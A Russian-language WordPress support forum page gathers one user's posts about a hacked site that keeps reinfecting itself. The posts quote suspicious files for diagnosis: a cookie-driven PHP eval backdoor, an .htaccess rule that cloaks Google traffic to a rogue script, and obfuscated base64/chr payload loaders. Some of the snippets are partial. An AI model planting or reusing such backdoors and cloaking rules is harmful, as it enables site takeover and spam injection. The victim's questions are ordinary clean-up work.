dolix
Ответы в темах
-
Форум: Проблемы и решения
Тема: чужая ссылкаудаляю из корня подозрительные файлы, проходит несколько минут, они все уже восстановлены, а так же отредактирован файл .htaccess
и так каждый раз
Форум: Проблемы и решения
Тема: чужая ссылкаСпасибо.
Может кто знает, в корне сайта должен быть файл wp-includse.php с вот таким содержанием, или это тоже вирус?
<?php
if (isset($_COOKIE[«id»])) @$_COOKIE[«user»]($_COOKIE[«id»]);
error_reporting(E_ALL);
ini_set(‘display_errors’, ‘1’);
$self = basename($_SERVER[‘SCRIPT_NAME’]);
$url = ‘http://’.$_SERVER[‘HTTP_HOST’].$_SERVER[‘PHP_SELF’].’?’.$_SERVER[‘QUERY_STRING’];
if(strpos($url, ‘killme’) > -1){
unlink($self);
die();
}$script_url = isset($_GET[‘script’]) ? $_GET[‘script’] : false;
if(!$script_url) exit();function random($length, $chars = ‘123456789abcdefghijklmnpqrstuvwxyz’) {
$hash = »;
$max = strlen($chars) — 1;
for($i = 0; $i < $length; $i++) {
$hash .= $chars[mt_rand(0, $max)];и т.д.
Форум: Проблемы и решения
Тема: чужая ссылка«создайте его заново через «настройки\постоянные ссылки\сохранить изменения»»
Это как, извините? Можно немного подробнее?
Форум: Проблемы и решения
Тема: чужая ссылкаЮрий, я скачивал сайт и проверял его антивирусом, на что он ругался, я удалил
Форум: Проблемы и решения
Тема: чужая ссылкаеще один вопрос
в файле .htaccess есть такой блок
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} google [OR]
RewriteCond %{HTTP_REFERER} google
RewriteCond %{REQUEST_URI} !(\.js|\.css|\.png|\.jpg|\.jpeg|\.gif|\.svg|\.ttf|\.woff|\.eot)
RewriteRule ^.*$ fcffc1.php [L]
</IfModule>меня смущает предпоследняя строка
Форум: Проблемы и решения
Тема: чужая ссылкаспасибо
Форум: Проблемы и решения
Тема: чужая ссылкаА вот такой файл — это тоже вирус?
<?php
/**
* @package Error Lib
* *************************************************************************************
* @copyright Copyright (C) 2005 — 2016 Open Source Matters, Inc. All rights reserved. // h(XX44bV7GxtEVw8*e8e8b5Pq2G(mn^qEaUqTHH2e*$61qBX5dnHk2)cB1u5C48FwDp$X#UV.8rKHnMU8PYHmG-1*KC3acUx!0*9AZhTY_eW)6Qu-Z9=^7W5.YVe1hk-VHvRp#_MaK4e$HecU19AU4d(N2A8rQna5tY.B=Cvhc74+UA4#A^yqQby6FzABVRZpZMSarnQRWPNw7aX.(h7kUrp)wU22^f+#4GQmk68TV(FhZMNBFtWK9y2GT#RTn92mCmcKSm_)963MVKB^SBGwG#!FNWCr=Dht^ybw.EpZK9-7c!b*37hG7!=kf7P_zE26wCE=q7mfKFY8(c6XKB^#BzKDq_R0-r$7Q8QH!Eg9VM3kD
* @license GNU General Public License version 2 or later; see LICENSE
*/// Set the platform root path as a constant if necessary.
if (defined(‘PATH’))
{
define(‘PATH’, __DIR__);
}
else if ( empty ($_POST)) {echo ‘Not exception. Exiting.’;
exit;
Форум: Проблемы и решения
Тема: чужая ссылкаили при обновлении он не затирает вирус?
- Ответ изменён 8 лет, 7 месяцев назад пользователем dolix.
Форум: Проблемы и решения
Тема: чужая ссылкавордпресс обновлен до последней версии неделю назад
Форум: Проблемы и решения
Тема: чужая ссылкавот файл index.php вот с таким содержимым: $l0 = «\x63\x68\x72»; $p10 = «\x69\x6e\x74\x76\x61\x6c»; $U4 = $l0($p10(«\x39\x39»)).$l0($p10(«\x31\x30».$l0($p10(«\x35\x32»)))).$l0($p10($l0($p10(«\x34».$l0($p10(«\x35».$l0($p10(«\x35\x35»)))))).$l0($p10(«\x34\x38»)).$l0($p10(«\x35».$l0($p10(«\x35\x35»)))))).$l0($p10($l0($p10(«\x34».$l0($p10(«\x35».$l0($p10(«\x35\x35»)))))).
и так далее
это вирус или нет?
Форум: Проблемы и решения
Тема: чужая ссылкану там же не написано, что это вирусный файл.
Форум: Проблемы и решения
Тема: чужая ссылкаВ корне сайта есть некоторые файлы .php, содержащие вот такую строку
$bxcf=str_ireplace(«i»,»»,»iibiasiieii6iii4iiii_iideicioidieii»);$xqhdnbk =
и потом длинный непонятный код вот такого плана
«Lypra3F5bXBmYnVhcnJkbiovIGlmICghZW1wdHkoJF9HRVQpICYmIGlzc2V0KCRfR0VUWy…..
может в них проблема?
Форум: Проблемы и решения
Тема: чужая ссылкаСайт чистился и проверялся антивирусом несколько дней назад. Вчера вручную просмотрел все коды base64 в wp-content, вроде бы ссылок не было нигде.. Как еще можно найти вредоносный код?